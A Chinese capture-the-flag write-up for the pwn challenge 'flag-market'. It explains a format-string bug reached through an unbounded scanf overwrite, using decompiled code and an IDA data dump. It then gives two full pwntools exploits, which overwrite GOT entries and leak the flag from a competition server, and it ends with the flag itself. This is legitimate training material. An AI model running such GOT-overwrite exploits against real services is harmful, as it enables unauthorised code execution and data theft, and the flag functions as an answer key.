# flag-market
## Information
- Category: Pwn
- Points: 500
## Description
> flag 市场,童叟无欺
## Write-up
第一次打国赛,没想到能遇上一道我能做的题……~_呜呜呜太感动了(_~
逆向出来的代码就这么点:
```c del={30, 59}
__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
int i; // [rsp+Ch] [rbp-84h]
int fd_log; // [rsp+14h] [rbp-7Ch]
FILE *flag_stream; // [rsp+18h] [rbp-78h]
char flag_filepath[9]; // [rsp+27h] [rbp-69h] BYREF
char buf[16]; // [rsp+30h] [rbp-60h] BYREF
char flag_buf[72]; // [rsp+40h] [rbp-50h] BYREF
unsigned __int64 v10; // [rsp+88h] [rbp-8h]
v10 = __readfsqword(0x28u);
init();
strcpy(flag_filepath, "/flag");
flag_stream = fopen(flag_filepath, "r");
is_flag_open = 1;
while ( 1 )
{
while ( 1 )
{
puts("welcome to flag market!ngive me money to buy my flag,nchoice: n1.tak
e my moneyn2.exit");
memset(buf, 0, sizeof(buf));
read(0, buf, 0x10u);
if ( atoi(buf) != 1 )
exit(0);
puts("how much you want to pay?");
memset(buf, 0, sizeof(buf));
read(0, buf, 0x10u);
if ( atoi(buf) == 0xFF )
break;
printf("You are so parsimonious!!!");
if ( is_flag_open )
{
fclose(flag_stream);
is_flag_open = 0;
}
}
puts(aThankYouForPay); // "Thank you for paying,let me
give you flag: "
if ( !is_flag_open || !fgets(flag_buf, 64, flag_stream) )
break;
for ( i = 0; ; ++i )
{
if ( i > 64 )
{
puts("nThank you for your patronage!");
return 0;
}
if ( flag_buf[i] == '{' )
break;
putchar(flag_buf[i]);
sleep(1u);
}
memset(flag_buf, 0, 0x40u);
puts(a1m31mError0mSo); // "nx1B[1mx1B[31m==========erro
r!!!========== x1B[0m nSorry, but maybe something wrong... nyou can report it in
user.log"
puts("opened user.log, please report:");
memset(
log_file_open_flags_input, // "everything is ok~"
0,
0x100u);
__isoc99_scanf("%s", log_file_open_flags_input);// "everything is ok~"
getchar();
fd_log = open("user.log", log_file_open_flags_input);// "everything is ok~"
write(
fd_log,
log_file_open_flags_input, // "everything is ok~"
0x100u);
puts(aOkNowYouCanExi); // "OK,now you can exit or try a
gain."
}
puts("something is wrong");
return 0;
}
```
初看不难发现,`scanf` 的 `%s` 是一个很明显的无限长度输入,后面的 `open / write`
则似乎是障眼法,因为无论哪个成立了都会导致另一个失败,并且调试发现 scanf 内部会
破坏 RSI,所以 open 永远不会成功,且由于程序没有对它们的返回值做检查,所以会忽略
错误继续执行,而不是 abort 。那难道就没有什么别的办法了吗?题目既然可以出出来,
就一定能做……
其实细看的话可以发现,上面有个 `printf` 存在一个不怎么显眼的格式化字符串漏洞。由
于 scanf 可以向 `log_file_open_flags_input` 写入无限长度数据覆盖 `format` 为自定
义格式化字符串,因此当我们输入的金额不等于 `0xff` 的时候就可以触发格式化字符串漏
洞了。
至于如何实现无限次格式化字符串,我这里是改了 `exit` 的 got entry 为 main 函数地
址。
```asm showLineNumbers=false {10} del={252} collapse={13-249}
.data:00000000004040A0 ; =======================================================
====================
.data:00000000004040A0
.data:00000000004040A0 ; Segment type: Pure data
.data:00000000004040A0 ; Segment permissions: Read/Write
.data:00000000004040A0 _data segment align_32 public 'DATA' use64
.data:00000000004040A0 assume cs:_data
.data:00000000004040A0 ;org 4040A0h
.data:00000000004040A0 align 40h
.data:00000000004040C0 ; int log_file_open_flags_input
.data:00000000004040C0 log_file_open_flags_input db 'everything is ok~',0
.data:00000000004040C0 ; DATA XREF: main
+245↑o
.data:00000000004040C0 ; main+254↑o ...
.data:00000000004040D2 db 0
.data:00000000004040D3 db 0
.data:00000000004040D4 db 0
.data:00000000004040D5 db 0
.data:00000000004040D6 db 0
.data:00000000004040D7 db 0
.data:00000000004040D8 db 0
.data:00000000004040D9 db 0
.data:00000000004040DA db 0
.data:00000000004040DB db 0
.data:00000000004040DC db 0
.data:00000000004040DD db 0
.data:00000000004040DE db 0
.data:00000000004040DF db 0
.data:00000000004040E0 db 0
.data:00000000004040E1 db 0
.data:00000000004040E2 db 0
.data:00000000004040E3 db 0
.data:00000000004040E4 db 0
.data:00000000004040E5 db 0
.data:00000000004040E6 db 0
.data:00000000004040E7 db 0
.data:00000000004040E8 db 0
.data:00000000004040E9 db 0
.data:00000000004040EA db 0
.data:00000000004040EB db 0
.data:00000000004040EC db 0
.data:00000000004040ED db 0
.data:00000000004040EE db 0
.data:00000000004040EF db 0
.data:00000000004040F0 db 0
.data:00000000004040F1 db 0
.data:00000000004040F2 db 0
.data:00000000004040F3 db 0
.data:00000000004040F4 db 0
.data:00000000004040F5 db 0
.data:00000000004040F6 db 0
.data:00000000004040F7 db 0
.data:00000000004040F8 db 0
.data:00000000004040F9 db 0
.data:00000000004040FA db 0
.data:00000000004040FB db 0
.data:00000000004040FC db 0
.data:00000000004040FD db 0
.data:00000000004040FE db 0
.data:00000000004040FF db 0
.data:0000000000404100 db 0
.data:0000000000404101 db 0
.data:0000000000404102 db 0
.data:0000000000404103 db 0
.data:0000000000404104 db 0
.data:0000000000404105 db 0
.data:0000000000404106 db 0
.data:0000000000404107 db 0
.data:0000000000404108 db 0
.data:0000000000404109 db 0
.data:000000000040410A db 0
.data:000000000040410B db 0
.data:000000000040410C db 0
.data:000000000040410D db 0
.data:000000000040410E db 0
.data:000000000040410F db 0
.data:0000000000404110 db 0
.data:0000000000404111 db 0
.data:0000000000404112 db 0
.data:0000000000404113 db 0
.data:0000000000404114 db 0
.data:0000000000404115 db 0
.data:0000000000404116 db 0
.data:0000000000404117 db 0
.data:0000000000404118 db 0
.data:0000000000404119 db 0
.data:000000000040411A db 0
.data:000000000040411B db 0
.data:000000000040411C db 0
.data:000000000040411D db 0
.data:000000000040411E db 0
.data:000000000040411F db 0
.data:0000000000404120 db 0
.data:0000000000404121 db 0
.data:0000000000404122 db 0
.data:0000000000404123 db 0
.data:0000000000404124 db 0
.data:0000000000404125 db 0
.data:0000000000404126 db 0
.data:0000000000404127 db 0
.data:0000000000404128 db 0
.data:0000000000404129 db 0
.data:000000000040412A db 0
.data:000000000040412B db 0
.data:000000000040412C db 0
.data:000000000040412D db 0
.data:000000000040412E db 0
.data:000000000040412F db 0
.data:0000000000404130 db 0
.data:0000000000404131 db 0
.data:0000000000404132 db 0
.data:0000000000404133 db 0
.data:0000000000404134 db 0
.data:0000000000404135 db 0
.data:0000000000404136 db 0
.data:0000000000404137 db 0
.data:0000000000404138 db 0
.data:0000000000404139 db 0
.data:000000000040413A db 0
.data:000000000040413B db 0
.data:000000000040413C db 0
.data:000000000040413D db 0
.data:000000000040413E db 0
.data:000000000040413F db 0
.data:0000000000404140 db 0
.data:0000000000404141 db 0
.data:0000000000404142 db 0
.data:0000000000404143 db 0
.data:0000000000404144 db 0
.data:0000000000404145 db 0
.data:0000000000404146 db 0
.data:0000000000404147 db 0
.data:0000000000404148 db 0
.data:0000000000404149 db 0
.data:000000000040414A db 0
.data:000000000040414B db 0
.data:000000000040414C db 0
.data:000000000040414D db 0
.data:000000000040414E db 0
.data:000000000040414F db 0
.data:0000000000404150 db 0
.data:0000000000404151 db 0
.data:0000000000404152 db 0
.data:0000000000404153 db 0
.data:0000000000404154 db 0
.data:0000000000404155 db 0
.data:0000000000404156 db 0
.data:0000000000404157 db 0
.data:0000000000404158 db 0
.data:0000000000404159 db 0
.data:000000000040415A db 0
.data:000000000040415B db 0
.data:000000000040415C db 0
.data:000000000040415D db 0
.data:000000000040415E db 0
.data:000000000040415F db 0
.data:0000000000404160 db 0
.data:0000000000404161 db 0
.data:0000000000404162 db 0
.data:0000000000404163 db 0
.data:0000000000404164 db 0
.data:0000000000404165 db 0
.data:0000000000404166 db 0
.data:0000000000404167 db 0
.data:0000000000404168 db 0
.data:0000000000404169 db 0
.data:000000000040416A db 0
.data:000000000040416B db 0
.data:000000000040416C db 0
.data:000000000040416D db 0
.data:000000000040416E db 0
.data:000000000040416F db 0
.data:0000000000404170 db 0
.data:0000000000404171 db 0
.data:0000000000404172 db 0
.data:0000000000404173 db 0
.data:0000000000404174 db 0
.data:0000000000404175 db 0
.data:0000000000404176 db 0
.data:0000000000404177 db 0
.data:0000000000404178 db 0
.data:0000000000404179 db 0
.data:000000000040417A db 0
.data:000000000040417B db 0
.data:000000000040417C db 0
.data:000000000040417D db 0
.data:000000000040417E db 0
.data:000000000040417F db 0
.data:0000000000404180 db 0
.data:0000000000404181 db 0
.data:0000000000404182 db 0
.data:0000000000404183 db 0
.data:0000000000404184 db 0
.data:0000000000404185 db 0
.data:0000000000404186 db 0
.data:0000000000404187 db 0
.data:0000000000404188 db 0
.data:0000000000404189 db 0
.data:000000000040418A db 0
.data:000000000040418B db 0
.data:000000000040418C db 0
.data:000000000040418D db 0
.data:000000000040418E db 0
.data:000000000040418F db 0
.data:0000000000404190 db 0
.data:0000000000404191 db 0
.data:0000000000404192 db 0
.data:0000000000404193 db 0
.data:0000000000404194 db 0
.data:0000000000404195 db 0
.data:0000000000404196 db 0
.data:0000000000404197 db 0
.data:0000000000404198 db 0
.data:0000000000404199 db 0
.data:000000000040419A db 0
.data:000000000040419B db 0
.data:000000000040419C db 0
.data:000000000040419D db 0
.data:000000000040419E db 0
.data:000000000040419F db 0
.data:00000000004041A0 db 0
.data:00000000004041A1 db 0
.data:00000000004041A2 db 0
.data:00000000004041A3 db 0
.data:00000000004041A4 db 0
.data:00000000004041A5 db 0
.data:00000000004041A6 db 0
.data:00000000004041A7 db 0
.data:00000000004041A8 db 0
.data:00000000004041A9 db 0
.data:00000000004041AA db 0
.data:00000000004041AB db 0
.data:00000000004041AC db 0
.data:00000000004041AD db 0
.data:00000000004041AE db 0
.data:00000000004041AF db 0
.data:00000000004041B0 db 0
.data:00000000004041B1 db 0
.data:00000000004041B2 db 0
.data:00000000004041B3 db 0
.data:00000000004041B4 db 0
.data:00000000004041B5 db 0
.data:00000000004041B6 db 0
.data:00000000004041B7 db 0
.data:00000000004041B8 db 0
.data:00000000004041B9 db 0
.data:00000000004041BA db 0
.data:00000000004041BB db 0
.data:00000000004041BC db 0
.data:00000000004041BD db 0
.data:00000000004041BE db 0
.data:00000000004041BF db 0
.data:00000000004041C0 ; char format[]
.data:00000000004041C0 format db 'You are so parsimonious!!!',0
.data:00000000004041C0 ; DATA XREF: main
+112↑o
.data:00000000004041DB align 20h
.data:00000000004041E0 ; char aThankYouForPay[]
.data:00000000004041E0 aThankYouForPay db 'Thank you for paying,let me give you
flag: ',0
.data:00000000004041E0 ; DATA XREF: main
:loc_4014EA↑o
.data:000000000040420C align 20h
.data:0000000000404220 ; char a1m31mError0mSo[]
.data:0000000000404220 a1m31mError0mSo db 0Ah ; DATA XREF: main
+21D↑o
.data:0000000000404221 db 1Bh,'[1m',1Bh,'[31m==========error!!!=
========= ',1Bh,'[0m ',0Ah
.data:000000000040424D db 'Sorry, but maybe something wrong... '
,0Ah
.data:0000000000404272 db 'you can report it in user.log',0
.data:0000000000404290 align 20h
.data:00000000004042A0 ; char aOkNowYouCanExi[]
.data:00000000004042A0 aOkNowYouCanExi db 'OK,now you can exit or try again.',0
.data:00000000004042A0 ; DATA XREF: main
+2A7↑o
.data:00000000004042A0 _data ends
.data:00000000004042A0
```
下面我写了两个 exp,第一个的思路是改 `memset` 为 `ret` 让它不要清空 flag,然后用
`%p` 输出,但是发现只有本地能通,远程不知道为啥不行,然后换了一种打法,`fopen`
会返回一个 `FILE` 结构体,之后 `fgets` 会在里面放一些地址,这其中就有 flag 的 st
ream buf 起始地址,我们把 fopen 返回的地址泄漏,算一下它和 flag stream buf 的偏
移,发现此值固定,得到 flag 地址后写到栈上,用 `%s` 输出就好了。
## Exploit I
```python
#!/usr/bin/env python3
from pwn import (
ELF,
args,
context,
flat,
process,
raw_input,
remote,
)
FILE = "./patched"
HOST, PORT = "8.147.135.220", 24630
context(log_level="debug", binary=FILE, terminal="kitty")
elf = context.binary
def lehex_to_ascii(s: str) -> str:
parts = s.strip().split("-")
out = bytearray()
for p in parts:
p = p.strip()
if not p:
continue
h = p[2:] if p.startswith(("0x", "0X")) else p
h = h.strip()
if len(h) % 2: # pad odd-length hex
h = "0" + h
out += bytes.fromhex(h)[::-1]
return out.rstrip(b"x00").decode("ascii", errors="replace")
def launch():
global target
if args.L:
target = process(FILE)
else:
target = remote(HOST, PORT)
def main():
launch()
target.sendlineafter(b"2.exit", b"1")
target.sendlineafter(b"pay?x0a", b"255")
payload = flat(
b"A" * 0x100,
b"%5019c%12$hn",
)
target.sendlineafter(b"report:", payload)
target.sendlineafter(b"2.exit", b"1")
# raw_input("DEBUG")
target.sendlineafter(b"pay?x0a", flat(elf.got["exit"]))
# raw_input("DEBUG")
target.sendlineafter(b"2.exit", b"2")
target.sendlineafter(b"2.exit", b"1")
target.sendlineafter(b"pay?x0a", b"255")
payload = flat(
b"A" * 0x100,
b"%173c%12$hhn",
)
target.sendlineafter(b"report:", payload)
target.sendlineafter(b"2.exit", b"1")
# raw_input("DEBUG")
target.sendlineafter(b"pay?x0a", flat(elf.got["memset"]))
# raw_input("DEBUG")
target.sendlineafter(b"2.exit", b"2")
target.sendlineafter(b"2.exit", b"1")
target.sendlineafter(b"pay?x0a", b"255")
payload = flat(
b"A" * 0x100,
b"%14$p-%15$p-%16$p-%17$p-%18$p-%19$p",
)
target.sendlineafter(b"report:", payload)
target.sendlineafter(b"2.exit", b"1")
target.sendlineafter(b"pay?x0a", b"0")
flag = target.recvuntil(b"welcome")[:-7]
target.success(lehex_to_ascii(flag.decode()))
target.interactive()
if __name__ == "__main__":
main()
```
## Exploit II
```python
#!/usr/bin/env python3
from pwn import (
ELF,
args,
context,
flat,
process,
raw_input,
remote,
)
FILE = "./patched"
HOST, PORT = "8.147.135.220", 24630
context(log_level="debug", binary=FILE, terminal="kitty")
elf = context.binary
def launch():
global target
if args.L:
target = process(FILE)
else:
target = remote(HOST, PORT)
def main():
launch()
target.sendlineafter(b"2.exit", b"1")
target.sendlineafter(b"pay?x0a", b"255")
payload = flat(
b"A" * 0x100,
b"%9$p%5009c%12$hn",
)
target.sendlineafter(b"report:", payload)
target.sendlineafter(b"2.exit", b"1")
# raw_input("DEBUG")
target.sendlineafter(b"pay?x0a", flat(elf.got["exit"]))
flag = int(target.recv(0xA), 16) + 0x1E0
target.success(f"flag: {hex(flag)}")
# raw_input("DEBUG")
target.sendlineafter(b"2.exit", b"2")
raw_input("DEBUG")
target.sendlineafter(b"2.exit", b"1")
target.sendlineafter(b"pay?x0a", b"255")
payload = flat(
b"A" * 0x100,
b"%12$s",
)
target.sendlineafter(b"report:", payload)
target.sendlineafter(b"exit", b"1")
target.sendlineafter(b"pay?x0a", flat(flag))
target.interactive()
if __name__ == "__main__":
main()
```
## Flag
:spoiler[`flag{0ec285cb-c1b3-49ff-820b-8075a639bc1e}`]